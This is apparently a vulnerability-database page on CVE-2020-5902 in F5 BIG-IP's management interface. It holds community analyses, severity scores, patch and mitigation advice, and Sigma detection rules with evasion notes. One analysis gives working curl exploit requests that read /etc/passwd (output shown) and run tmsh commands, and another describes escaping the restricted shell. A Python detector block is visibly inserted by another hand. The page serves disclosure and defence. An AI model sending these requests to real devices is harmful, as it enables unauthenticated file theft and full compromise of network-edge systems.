Attacker Value
Very High
(8 users assessed)
Exploitability
Very High
(8 users assessed)
User Interaction
None
Privileges Required
None
Attack Vector
Network
16

CVE-2020-5902 — TMUI RCE vulnerability

Disclosure Date: July 01, 2020
Exploited in the Wild

Description

In BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages.


6
Ratings
Technical Analysis

Overview

This one is critical to patch quickly, with a CVSS score of 10.

If an attacker can gain access to the TMUI Configuration utility port, they can gain unauthenticated Remote Code Execution. All versions of BIG-IP from 11.x through 15.x are vulnerable.

Patch & Mitigation

Patches are out, but F5 has also listed a set of mitigation techniques to reduce the attack surface. This takes it from unauthenticated RCE to authenticated RCE, which is still bad.

Refer to the F5 article for details: https://support.f5.com/csp/article/K52145254

Cloud Services

If you are using AWS, Azure or GCP cloud images, check that the version number is fully patched against the correct version numbers.

  • At the time of writing, the AWS Marketplace version is 15.1.0.2-0.0.9

In-the-wild PoC

Within 24 hours this has been exploited in the wild with simple-to-replicate proofs of concept.

Core Vulnerability

The core of this vulnerability lies in a path traversal that leads to auth bypass. With this, you can use built-in functions to gain file read/write, or you can access the web-based shell to create accounts with shell access.

Here are some redacted examples. The redaction will be removed once more details are public.
Enough information is now public that I am removing the redaction. The following examples show:

  • File read
  • File Write
  • tmsh access

curl --insecure  'https://f5-bigip.home.lab:8443/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'


{"output":"root:x:0:0:root:\/root:\/sbin\/nologin\nbin:x:1:1:bin:\/bin:\/sbin\/nologin\ndaemon:x:2:2:daemon:\/sbin:\/sbin\/nologin\nadm:x:3:4:adm:\/var\/adm:\/sbin\/nologin\nlp:x:4:7:lp:\/var\/spool\/lpd:\/sbin\/nologin\nmail:x:8:12:mail:\/var\/spool\/mail:\/sbin\/nologin\noperator:x:11:0:operator:\/root:\/sbin\/nologin\nnobody:x:99:99:Nobody:\/:\/sbin\/nologin\ntmshnobody:x:32765:32765:tmshnobody:\/:\/sbin\/nologin\nadmin:x:0:500:Admin User:\/home\/admin:\/bin\/bash\nvcsa:x:69:69:virtual console memory owner:\/dev:\/sbin\/nologin\ndbus:x:81:81:System message bus:\/:\/sbin\/nologin\nsystemd-bus-proxy:x:974:998:systemd Bus Proxy:\/:\/sbin\/nologin\nsystemd-network:x:192:192:systemd Network Management:\/:\/sbin\/nologin\npolkitd:x:27:27:User for polkitd:\/:\/sbin\/nologin\nnslcd:x:65:55:LDAP Client User:\/:\/sbin\/nologin\ntss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:\/dev\/null:\/sbin\/nologin\npostgres:x:26:26:PostgreSQL Server:\/var\/local\/pgsql\/data:\/sbin\/nologin\ntomcat:x:91:91:Apache Tomcat:\/usr\/share\/tomcat:\/sbin\/nologin\nhsqldb:x:96:96::\/var\/lib\/hsqldb:\/sbin\/nologin\nsshd:x:74:74:Privilege-separated SSH:\/var\/empty\/sshd:\/sbin\/nologin\nrpc:x:32:32:Rpcbind Daemon:\/var\/lib\/rpcbind:\/sbin\/nologin\nntp:x:38:38::\/etc\/ntp:\/sbin\/nologin\nf5_remoteuser:x:499:499:f5 remote user account:\/home\/f5_remoteuser:\/sbin\/nologin\ntcpdump:x:72:72::\/:\/sbin\/nologin\noprofile:x:16:16:Special user account to be used by OProfile:\/:\/sbin\/nologin\nsdm:x:191:996:sdmuser:\/var\/sdm:\/bin\/false\nnamed:x:25:25:Named:\/var\/named:\/bin\/false\napache:x:48:48:Apache:\/usr\/local\/www:\/sbin\/nologin\nsyscheck:x:199:10::\/:\/sbin\/nologin\nmysql:x:98:98:MySQL server:\/var\/lib\/mysql:\/sbin\/nologin\nrestnoded:x:198:198::\/:\/sbin\/nologin\nGuest:x:16110:500:Guest:\/home\/Guest:\/sbin\/nologin\n"}

This doesn’t only affect the login.jsp path; it can be used from anywhere.

curl --insecure  'https://f5-bigip.home.lab:8443/tmui/tmui/login/welcome.jsp/..;/..;/locallb/workspace/fileRead.jsp?fileName=/etc/passwd' 


{"output":"root:x:0:0:root:\/root:\/sbin\/nologin\nbin:x:1:1:bin:\/bin:\/sbin\/nologin\ndaemon:x:2:2:daemon:\/sbin:\/sbin\/nologin\nadm:x:3:4:adm:\/var\/adm:\/sbin\/nologin\nlp:x:4:7:lp:\/var\/spool\/lpd:\/sbin\/nologin\nmail:x:8:12:mail:\/var\/spool\/mail:\/sbin\/nologin\noperator:x:11:0:operator:\/root:\/sbin\/nologin\nnobody:x:99:99:Nobody:\/:\/sbin\/nologin\ntmshnobody:x:32765:32765:tmshnobody:\/:\/sbin\/nologin\nadmin:x:0:500:Admin User:\/home\/admin:\/bin\/bash\nvcsa:x:69:69:virtual console memory owner:\/dev:\/sbin\/nologin\ndbus:x:81:81:System message bus:\/:\/sbin\/nologin\nsystemd-bus-proxy:x:974:998:systemd Bus Proxy:\/:\/sbin\/nologin\nsystemd-network:x:192:192:systemd Network Management:\/:\/sbin\/nologin\npolkitd:x:27:27:User for polkitd:\/:\/sbin\/nologin\nnslcd:x:65:55:LDAP Client User:\/:\/sbin\/nologin\ntss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:\/dev\/null:\/sbin\/nologin\npostgres:x:26:26:PostgreSQL Server:\/var\/local\/pgsql\/data:\/sbin\/nologin\ntomcat:x:91:91:Apache Tomcat:\/usr\/share\/tomcat:\/sbin\/nologin\nhsqldb:x:96:96::\/var\/lib\/hsqldb:\/sbin\/nologin\nsshd:x:74:74:Privilege-separated SSH:\/var\/empty\/sshd:\/sbin\/nologin\nrpc:x:32:32:Rpcbind Daemon:\/var\/lib\/rpcbind:\/sbin\/nologin\nntp:x:38:38::\/etc\/ntp:\/sbin\/nologin\nf5_remoteuser:x:499:499:f5 remote user account:\/home\/f5_remoteuser:\/sbin\/nologin\ntcpdump:x:72:72::\/:\/sbin\/nologin\noprofile:x:16:16:Special user account to be used by OProfile:\/:\/sbin\/nologin\nsdm:x:191:996:sdmuser:\/var\/sdm:\/bin\/false\nnamed:x:25:25:Named:\/var\/named:\/bin\/false\napache:x:48:48:Apache:\/usr\/local\/www:\/sbin\/nologin\nsyscheck:x:199:10::\/:\/sbin\/nologin\nmysql:x:98:98:MySQL server:\/var\/lib\/mysql:\/sbin\/nologin\nrestnoded:x:198:198::\/:\/sbin\/nologin\nGuest:x:16110:500:Guest:\/home\/Guest:\/sbin\/nologin\n"}
curl --insecure  'https://f5-bigip.home.lab:8443/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'

4
Ratings
  • Attacker Value
    Very High
Technical Analysis

There have been several reports of exploitation in the wild as of July 4. The one I’ve seen cited the most is here.

3
Ratings
  • Attacker Value
    Very High
  • Exploitability
    Very High
Technical Analysis

Noticed an initial script from @RootUp that looks handy for scanning environments: https://raw.githubusercontent.com/RootUp/PersonalStuff/master/http-vuln-cve2020-5902.nse

This script may be better, with fewer false positives, according to here:
https://github.com/rwincey/CVE-2020-5902-NSE/blob/master/http-f5-tmui-path-traversal.nse

Note that these scripts actively exploit the vuln, which may not be legal to run without permission, as noted by @tsellers-r7: https://twitter.com/TomSellers/status/1280485081908305920

3
Ratings
Technical Analysis

If the exploit fits in a tweet, you know it’s pretty bad lmao

2
Ratings
Technical Analysis

Update July 2021: https://us-cert.cisa.gov/ncas/alerts/aa21-209a notes that this was one of the most commonly exploited vulnerabilities by APT groups in 2020.

Just wanted to add in the fact that it is now supposedly being exploited by Chinese state-sponsored actors, according to the NSA announcement at https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF

2
Ratings
Technical Analysis

In the most recent vulnerable versions of BIG-IP, accessing TMSH through the TMUI path traversal leads to “RCE” insofar as you can execute management commands in a restricted TMSH environment.

That said, there are a few different ways you can break out of the restricted shell. One method utilizes TMSH’s command alias functionality to map a blocked command to an allowed command. This results in Unix shell access as root.

In either case, privileged access to an F5 BIG-IP device is critical, as these often sit at network borders and even provide SSL termination!

CVSS V3 Severity and Metrics

Base Score: 9.8 Critical
Impact Score: 5.9
Exploitability Score: 3.9
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): None
User Interaction (UI): None
Scope (S): Unchanged
Confidentiality (C): High
Integrity (I): High
Availability (A): High

General Information

Products

  • BIG-IP

References

Additional Info

Technical Analysis

Description: On July 3, F5 Networks announced that its BIG-IP Traffic Management User Interface (TMUI) has a remote code execution vulnerability (CVE-2020-5902) in undisclosed pages. Successful exploitation allows unauthenticated attackers, or authenticated users, with network access to the TMUI, through the BIG-IP management port and/or Self IPs, to execute arbitrary system commands, create or delete files, disable services, and/or execute arbitrary Java code. This vulnerability may result in complete system compromise. See F5’s advisory, which was published June 30, for full details.

CVE-2020-5902 carries a CVSSv3 base score of 10.0 and is known to be actively exploited in the wild as of July 3, 2020. Security researcher Kevin Beaumont also noted on Sunday, July 5 that BIG-IP boxes are being targeted with automated credential scraping, and that organizations whose BIG-IP instances were yet to be upgraded should rotate credentials and examine log data.

Affected products include: BIG-IP (LTM, AAM, AFM, Analytics, APM, ASM, DNS, FPS, GTM, Link Controller, PEM)

Known vulnerable versions:

  • 15.1.0
  • 15.0.0
  • 14.1.0 – 14.1.2
  • 13.1.0 – 13.1.3
  • 12.1.0 – 12.1.5
  • 11.6.1 – 11.6.5

F5’s advisory notes that “the BIG-IP system in Appliance mode is also vulnerable. This issue is not exposed on the data plane; only the control plane is affected.”

Rapid7 analysis: BIG-IP is common in enterprise and high-value environments and makes an extremely attractive attack target even for vulnerabilities with higher barriers to exploitation. CVE-2020-5902 presents no such hurdle for attackers; the vulnerability is easily exploitable and straightforward to weaponize. As of July 5, Rapid7’s vulnerability research and exploit development team has tested multiple attack vectors and was able to achieve unauthenticated remote root code execution with one of them: RCE in this case results from security flaws in multiple components, such as one that allows directory traversal exploitation. Metasploit exploit code that obtains a root shell on vulnerable versions of BIG-IP is here.

Over the weekend, the research community published a widely shared Sigma rule to detect exploitation. The rule is under active revision to account for and mitigate a number of different evasions. Further details are below, but in general defenders should be aware of quickly evolving information about mitigation and detection bypasses. Defenders can mitigate the risk of evasions by modifying monitoring processes to alert on unique components (e.g., ..;, tmui) and setting more precise matching rules.

Originally, the Sigma rule checked for a base path, /tmui/login, like so:

detection:
  selection_base:
    c-uri|contains: '/tmui/login'
  selection_traversal:
    c-uri|contains:
      - '..;/'
      - '.jsp/..'
  condition: selection_base and selection_traversal

This means the path must contain /tmui/login as a prerequisite, and then either ..;/ or .jsp/.. as the traversal marker. Rapid7 researchers verified as of July 7, 2020 that it was possible for attackers to circumvent the rule—for instance by modifying the login path to /tmui/./login, where . means current directory (/tmui). In general, path normalization works against detection rules here: the server normalizes the added . away, so /tmui/./login resolves to /tmui/login while the literal string /tmui/login never appears in the logged request. As of July 8, this evasion has since been mitigated by updates to the Sigma rule. However, Metasploit researchers have tested further evasions that, for instance, break selection_traversal instead of selection_base. Our guidance for defenders remains the same—alerting on unique components and setting precise matching rules is recommended as an overarching strategy regardless of the particulars of each new evasion.
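As an added example (not from the page, the Sigma rule's authors or Rapid7's tooling), the following Python re-implements the original Sigma rule's string matching literally beside a component-based check of the kind recommended above, and runs both over constructed sample request URIs: the two traversal shapes shown in the earlier PoC commands, the /tmui/./login evasion, and benign TMUI traffic. The sample URIs and the assumption that the segment-splitting check is a sufficient stand-in for a full log pipeline are mine.

```python
from urllib.parse import urlsplit, unquote

# Constructed sample request URIs (not real log data). Index 2 is the
# /tmui/./login evasion discussed above; index 3 is an ordinary login request.
SAMPLE_URIS = [
    "/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd",
    "/tmui/tmui/login/welcome.jsp/..;/..;/locallb/workspace/tmshCmd.jsp?command=list",
    "/tmui/./login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/hosts",
    "/tmui/login.jsp",
]


def original_sigma_match(uri: str) -> bool:
    """Literal re-implementation of the first Sigma rule:
    base path '/tmui/login' AND one of the two traversal substrings."""
    has_base = "/tmui/login" in uri
    has_traversal = "..;/" in uri or ".jsp/.." in uri
    return has_base and has_traversal


def suspicious_components(uri: str) -> set:
    """Component-based check: percent-decode, drop the query string, split the
    path on '/', and report the unique pieces worth alerting on ('..;' and
    'tmui') regardless of what base path precedes them."""
    path = unquote(urlsplit(uri).path)
    found = set()
    for segment in path.split("/"):
        # A '..;' segment is the traversal marker shown in the PoC requests;
        # the servlet container treats the ';' suffix as a path parameter and
        # the segment itself as '..', which is what defeats the auth check.
        if segment.startswith("..;"):
            found.add("..;")
        if segment == "tmui":
            found.add("tmui")
    return found


def component_rule_match(uri: str) -> bool:
    """Alert when a 'tmui' segment and a '..;' traversal segment both appear."""
    components = suspicious_components(uri)
    return "..;" in components and "tmui" in components


def evaluate(uris=SAMPLE_URIS):
    """Return (uri, original_rule_hit, component_rule_hit) for each sample."""
    return [(u, original_sigma_match(u), component_rule_match(u)) for u in uris]


if __name__ == "__main__":
    for uri, orig_hit, comp_hit in evaluate():
        print(f"original={orig_hit!s:5} component={comp_hit!s:5} {uri}")
```

The third sample shows the gap the text describes: the original rule's traversal clause still fires on .jsp/.. but its base clause misses /tmui/./login, while the component check flags it.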

Guidance:
F5 Networks customers running affected products should upgrade to a non-vulnerable version as quickly as possible. If you are unable to patch, F5 lists a number of mitigation options with detailed instructions in the Security Advisory Recommended Actions section of their advisory. In general, organizations should avoid exposing management interfaces to the public internet.

Update August 4, 2020: AlienVault and Trend Micro research has said this week that a Mirai botnet exploit has been weaponized to attack IoT devices via CVE-2020-5902. Per Trend Micro’s report, “a Mirai botnet downloader (detected by Trend Micro as Trojan.SH.MIRAI.BOI) can be added to new malware variants to scan for exposed Big-IP boxes for intrusion and deliver the malicious payload.”

Update July 13, 2020: Researchers have strongly emphasized that patching is far preferred to applying mitigations. The mitigation bypass shared last week has been detected in the wild since at least July 7. Further information from F5 Networks is below, but organizations that were unable to patch and instead applied the mitigation should assess their systems for compromise and patch as soon as possible.

Update July 8, 2020: The F5 Networks communication below advises BIG-IP customers who were unable to patch that their previously suggested mitigation is able to be circumvented.

“The Security Advisory for this CVE contained a suggested mitigation, for those unable to upgrade immediately, which was believed to prevent unauthenticated attackers from exploiting the vulnerability. Today F5 received new information, which indicated there was a method for attackers to circumvent the mitigation and compromise an unpatched system.

A new mitigation has been developed, and an updated Security Advisory has been published: K52145254: TMUI RCE vulnerability CVE-2020-5902. F5 recommends applying this new mitigation to all systems which have not yet been upgraded to a patched release, including those systems which were previously mitigated.”

As community reports have indicated both active exploitation of CVE-2020-5902 and automated credential scraping, BIG-IP customers should also strongly consider changing credentials and examining their logs for unusual activity. Organizations should assess whether their individual risk models warrant further incident response or other compromise investigation.